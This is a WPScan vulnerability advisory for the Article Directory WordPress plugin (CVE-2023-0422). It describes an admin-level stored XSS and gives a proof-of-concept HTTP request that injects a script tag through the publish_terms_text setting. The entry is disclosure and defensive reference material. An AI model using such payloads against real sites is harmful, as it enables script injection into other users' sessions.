WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Article Directory <= 1.3 - Admin+ Stored XSS

Description

The plugin does not properly sanitize the `publish_terms_text` setting before displaying it in the administration panel, which may enable administrators to conduct Stored XSS attacks in multisite contexts.

Proof of Concept

```
POST /wordpress/wp-admin/options.php HTTP/1.1
Host: 172.28.128.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://172.28.128.6/wordpress/wp-admin/options-general.php?page=article-directory%2Farticle-directory.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 1234
Origin: http://172.28.128.6
Connection: close
Cookie: wordpress_b92078c82d0f1044cdfb065e7ae28bec=admin%7C1672746064%7CQtuyq4Np2JGSAZb83cNhdojTDRRIDPVisa0ndOhoEPO%7Cec675c4bca520751295d2189a34017309eeba5b54a5f39c1c85643a6c0718e17; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_b92078c82d0f1044cdfb065e7ae28bec=admin%7C1672746064%7CQtuyq4Np2JGSAZb83cNhdojTDRRIDPVisa0ndOhoEPO%7Cbc4ecbc11fae0c1cfc10ad70b8372835f2b30f3abed1872afa83058e16611a00; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1672573750
Upgrade-Insecure-Requests: 1

option_page=article_directory&action=update&_wpnonce=374f46ff36&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Darticle-directory%252Farticle-directory.php&article_directory%5Bcolumn_count%5D=3&article_directory%5Bsort_by%5D=0&article_directory%5Bsort_direction%5D=0&article_directory%5Bshow_parent_count%5D=1&article_directory%5Bdesc_for_parent_title%5D=1&article_directory%5Bno_child_alert%5D=1&article_directory%5Bshow_child%5D=1&article_directory%5Bshow_child_count%5D=1&article_directory%5Bmaximum_child%5D=0&article_directory%5Bdesc_for_child_title%5D=1&article_directory%5Bchild_hierarchical%5D=1&article_directory%5Bhide_empty%5D=0&article_directory%5Bexclude_cats%5D=0&article_directory%5Bauthor_interface%5D=0&article_directory%5Bauthor_panel_id%5D=123&article_directory%5Barticle_status%5D=0&article_directory%5Bminimum_symbols%5D=700&article_directory%5Bmaximum_links%5D=3&article_directory%5Bshow_editor%5D=1&article_directory%5Bdefault_editor%5D=html&article_directory%5Bsel_only_one_cat%5D=1&article_directory%5Bshow_tags%5D=0&article_directory%5Ballow_new_tags%5D=0&article_directory%5Bpublish_terms_text%5D=asdfghj</textarea></td><script>alert(document.domain)</script>&article_directory%5Bkinderloss%5D=1&article_directory%5Bshow_article_code%5D=0
```

Please replace the nonce and cookie values.

This exploit works for inter-admin. 

Affects Plugins

article-directory
No known fix - plugin closed

References

CVE
CVE-2023-0422

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Shreya Pohekar

Submitter

Shreya Pohekar

Submitter website
https://shreyapohekar.com
Submitter twitter
shreyapohekar
Verified

Yes

WPVDB ID
d57f2fb2-5251-4069-8c9a-a4af269c5e62

Timeline

Publicly Published

2023-03-17 (about 2 months ago)

Added

2023-03-17 (about 2 months ago)

Last Updated

2023-03-17 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us